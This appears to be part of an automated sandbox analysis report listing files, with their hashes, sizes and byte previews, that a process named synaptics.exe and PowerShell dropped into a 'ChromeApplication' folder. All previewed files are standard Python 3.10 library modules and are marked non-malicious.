                                                                                                                                                                                                  Preview:o.......:.-d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\_sitebuiltins.cpython-310.pyc.11046944

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3579
                                                                                                                                                                                                  Entropy (8bit):5.075177194760708
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ysOn3Ah9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:ys8Afcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                                  MD5:D1619889A2ACC3E25C3F903E1ABB8359
                                                                                                                                                                                                  SHA1:446A2B6177A02223A01CDA68EA13D9FBD50BA44F
                                                                                                                                                                                                  SHA-256:83B0976DAB14E2B6D757D58F369D97D30B9E6C4ACFBA9D3DE80E4029A312760B
                                                                                                                                                                                                  SHA-512:679AFEB6586E157F91B03DAE6F20AF265FE7A31DBDBFF7FE341EC4C84ABFF562F54DAC96C95BA6524656EDCE2368FB3694733E63FF6F225E08CF14788B560645
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r.....DC:\Users\user\AppData\Local\ChromeApplication\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prom

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\abc.cpython-310.pyc.9729824

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6783
                                                                                                                                                                                                  Entropy (8bit):5.121236586738526
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:5c2+dPAL6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:22+dPjMGxYtag2VXLk5ewc
                                                                                                                                                                                                  MD5:57B781EFC4A1ACE2B78C33C0288D2A12
                                                                                                                                                                                                  SHA1:A208364FCE3EEE11E1FF9C2B67094448E7F271B3
                                                                                                                                                                                                  SHA-256:B96599BACF0B1A1169304DC030A1980B821B15015C3DD86254824F5D10C6644D
                                                                                                                                                                                                  SHA-512:34E63025D8807B543B1B1F9501CC933BD28FC6981605057801722E455FBF75EBDAD65E7AE10F9F68E2D49B298BC26ADCDDB69BDD705A091B63CE9337CED4A798
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....:C:\Users\user\AppData\Local\ChromeApplica

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\codecs.cpython-310.pyc.9731392

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33251
                                                                                                                                                                                                  Entropy (8bit):5.02172627428587
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Gl/o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:GvUkFrOZwENNflPKPBxKa
                                                                                                                                                                                                  MD5:F280F0558E450045A45D014F4C71C5A9
                                                                                                                                                                                                  SHA1:3FFF2CECB2DAB9E84336D6338A41887228A204D0
                                                                                                                                                                                                  SHA-256:B17373339FC55EA0707C3ACBF24A2AEAB1EDE2C1CF427348A36D2866AFC25D71
                                                                                                                                                                                                  SHA-512:8132F063EDE808721BD7D85F0EF8540CA6012099C4F7F72DA42660EAD55100CF832D711C6E8B5B5850B8D62D42328D22B2D17EB700F29F9400CEF9A5B699FC77
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\genericpath.cpython-310.pyc.9662120

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3939
                                                                                                                                                                                                  Entropy (8bit):5.170336374379411
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:9qsfAs4EveosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:Gs49tKyow8/tjgqWoZ
                                                                                                                                                                                                  MD5:CB969C65C0920A816C725F8C5B3C9C0A
                                                                                                                                                                                                  SHA1:021185F22A723C5ADD4DC3FD4C9A83FC20877B45
                                                                                                                                                                                                  SHA-256:8F8DE00C68E0515B89039C3988B204A88AD6400BBBBBFD1E5274F3307A6BFC42
                                                                                                                                                                                                  SHA-512:8617DC310DCFA4A346632330811195D82994E1C9125DAAB171394115D2764E6631FACFC13A0E68C7617D68DEFA93136A4983EB2707703E67503728BA3CC03670
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r.....BC:\Users\user\AppData\Local\ChromeApplication\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\io.cpython-310.pyc.9731728

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3695
                                                                                                                                                                                                  Entropy (8bit):5.391465068163799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:2jeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwGjEPOcGcMzzMfSd:2UK0iSxOmoWF2vLAy/hyIP7GcmYa7RXn
                                                                                                                                                                                                  MD5:9B8B2828F2F9AB389BCAD678AEC74389
                                                                                                                                                                                                  SHA1:7C297EC51D16FC5E6FF83FF591A1935D5167C6B2
                                                                                                                                                                                                  SHA-256:B8348B9CFB59D3AD22F434324D67D2B49B3AC2FD59D3FFC36C918F1DFB8D4D25
                                                                                                                                                                                                  SHA-512:4392333662C0F618659E8393C4820F1006855BE2F2F397694E380B4655AB32820A8508F6CBD452F7A13BE2AC540CC03DC5BA707181A3DE9FA5FF8C1EBBA06EBE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\ntpath.cpython-310.pyc.10758368

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15335
                                                                                                                                                                                                  Entropy (8bit):5.432324131915421
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+7Lr8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:yra/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                                  MD5:FF17D5F195205F3B13BC762D29C1322F
                                                                                                                                                                                                  SHA1:699F0B47D78779C3EDCDF4AA9DB77C9542CD5F3B
                                                                                                                                                                                                  SHA-256:FE9E962189F87334DE9394B8197FF1BDF154866910B1A26D151878C3AD6A52FC
                                                                                                                                                                                                  SHA-512:19DE5E40B0EC3007328A244204FA1E9B48B7E4538A628A3F6E71C49F0BCA7F618E0CA13D2A2A49753A7345518E45EDE1DBF52D2FF6DA533C70705339F7FBD896
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\os.cpython-310.pyc.10757136

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31631
                                                                                                                                                                                                  Entropy (8bit):5.451817529639715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:HZz4m1oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:bbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                                  MD5:8F684B0565191E2773DC8324D16A655A
                                                                                                                                                                                                  SHA1:27DA00770BD57021441C889CF8FEA1B1A092B0F3
                                                                                                                                                                                                  SHA-256:0C43E1C2DEBB84A18A6C0CBCFA81789C83D587A3A3A6208BED2D9AFC264FFFB4
                                                                                                                                                                                                  SHA-512:2007409521D20FBA48C246449D9382B99E98F7CD180D34452DE00A91D6A0A2152893580DFF23FA32E57F2B095FFAA4F02054F5D4291407F0934536520E99EA9E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\site.cpython-310.pyc.10756912

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17412
                                                                                                                                                                                                  Entropy (8bit):5.509551124966349
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:zlp3Tn42l1YP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:vL42l+g7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                                  MD5:1DB63D2AF229624ED67A41BF413B5058
                                                                                                                                                                                                  SHA1:BE10235DBF0A9A5386884DC2D3A0E3F2FECA9418
                                                                                                                                                                                                  SHA-256:75457647E39BDD081F98671C871C6AD061F4295179B01BB005C5C78B76BCE884
                                                                                                                                                                                                  SHA-512:875F6A64E3618BE61A3F44CB1A539B0AECE99D320D3A898E5321B535796245C9DA6F97BF98B26FFEF51A68FA2FC493291F7F2C47BB44CC2D1FCFF9BEEE4AC0B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\stat.cpython-310.pyc.10756912

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4305
                                                                                                                                                                                                  Entropy (8bit):5.545136817136632
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Gn/f+60wN3EXHP/aowjk0wBoCAEFXOrW6QBeABPl:GeRy3EXBwjk0w+CFXefQBT
                                                                                                                                                                                                  MD5:AB74846BBFA991F2C708E16F81C920E0
                                                                                                                                                                                                  SHA1:16825B210FC1E1F4AAFC4EB07EC5F2F5213A06CB
                                                                                                                                                                                                  SHA-256:084C9E18EBB4B9FBA2FFFFE004BD96B4C133DE89E801931C9C2D155A72D78D13
                                                                                                                                                                                                  SHA-512:1F0B285C1B93BA98A0DC8C5A2A9C5F2F1BDE2D1853BA7463DF34B6FEBE7C40BCAFABF2DFCEB3E1ECC2DB59433816B69D6E8274FA032F1D972741315643087D57
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....;C:\Users\user\AppData\Local\ChromeApplication\lib\stat.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_aix_support.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3359
                                                                                                                                                                                                  Entropy (8bit):5.102406469186923
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:108JH5EP/oN8I2Rqpb/fmfbuoakRVsRo61RmT+F8R2HR7:10roXh/fmTuoNRVsRo2RRR7
                                                                                                                                                                                                  MD5:4DEA757F6D3EB1A2EF11BDAAD4E23DD2
                                                                                                                                                                                                  SHA1:4806A790E4801C528111299BAD115F604D4C53EB
                                                                                                                                                                                                  SHA-256:E10D74710901AE5610CAD66273F45F24FE446CAA74AD27D3F7C199CEB92C9B21
                                                                                                                                                                                                  SHA-512:68249AAEAD32F52E6555FC0B688DB8A6DFD33BC0F5C975EFC8EAA0A74EEA9152318836C653790FA7C38BA2DC26D5766544B89D92BAB64372B0750F89D5360C53
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Shared AIX support functions."""....import sys..import sysconfig....try:.. import subprocess..except ImportError: # pragma: no cover.. # _aix_support is used in distutils by setup.py to build C extensions,.. # before subprocess dependencies like _posixsubprocess are available... import _bootsubprocess as subprocess......def _aix_tag(vrtl, bd):.. # type: (List[int], int) -> str.. # Infer the ABI bitwidth from maxsize (assuming 64 bit as the default).. _sz = 32 if sys.maxsize == (2**31-1) else 64.. # vrtl[version, release, technology_level].. return "aix-{:1x}{:1d}{:02d}-{:04d}-{}".format(vrtl[0], vrtl[1], vrtl[2], bd, _sz)......# extract version, release and technology level from a VRMF string..def _aix_vrtl(vrmf):.. # type: (str) -> List[int].. v, r, tl = vrmf.split(".")[:3].. return [int(v[-1]), int(r), int(tl)]......def _aix_bosmp64():.. # type: () -> Tuple[str, int].. """.. Return a Tuple[str, int] e.g., ['7.1.4.34', 1806].. The fi

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_bootsubprocess.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2772
                                                                                                                                                                                                  Entropy (8bit):4.431404312247647
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:FEDKp2B5JX6YOo/SEP5iFYoe5MCyNNlYbqMgwOF8zCEuo/+5q9Wam:uDr9X6MEKb9gwuojFm
                                                                                                                                                                                                  MD5:977B851F41A21AB6862A9527A8490AB5
                                                                                                                                                                                                  SHA1:9F882F4FFF8CB58CDF9F874A7E74DBEAE824E430
                                                                                                                                                                                                  SHA-256:4C817B46039F0162413A4384EFFEA304E933307E9B40527C8AB02FB64079AB7D
                                                                                                                                                                                                  SHA-512:1B24DAA30A11A1F8E4A455558E4B2D74EBFCBF7EC1275F3D1C54EB02AD820CA037D98166B6B53C8350D9BDDAEDF0BD5EFD3E508EE6AEF186FA5BDC3193C9A374
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""..Basic subprocess implementation for POSIX which only uses os functions. Only..implement features required by setup.py to build C extension modules when..subprocess is unavailable. setup.py is not used on Windows..."""..import os......# distutils.spawn used by distutils.command.build_ext..# calls subprocess.Popen().wait()..class Popen:.. def __init__(self, cmd, env=None):.. self._cmd = cmd.. self._env = env.. self.returncode = None.... def wait(self):.. pid = os.fork().. if pid == 0:.. # Child process.. try:.. if self._env is not None:.. os.execve(self._cmd[0], self._cmd, self._env).. else:.. os.execv(self._cmd[0], self._cmd).. finally:.. os._exit(1).. else:.. # Parent process.. _, status = os.waitpid(pid, 0).. self.returncode = os.waitstatus_to_exitcode(status).... return self.ret

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\_collections_abc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33455
                                                                                                                                                                                                  Entropy (8bit):4.523318335419718
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:IOnTX1Ewkx023y0SuqlTWbbYXxeF6tTgA/rTNq4bD5sSeWtvVUzh:lnTYYh4kreivVUzh
                                                                                                                                                                                                  MD5:FAA0E5D517CF78B567A197CB397B7EFC
                                                                                                                                                                                                  SHA1:2D96F3E00AB19484FF2487C5A8B59DFE56A1C3AC
                                                                                                                                                                                                  SHA-256:266CCCEB862EA94E2B74FDDA4835F8EF149D95C0FC3AAFE12122D0927E686DD3
                                                                                                                                                                                                  SHA-512:295601F6A33DD0E9C38B5756BFA77C79402E493362FB7F167B98A12208BAC765101E91A66398D658E1673B7624C8D1A27F6E12EC32FEF22DF650B64E7728CA8D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
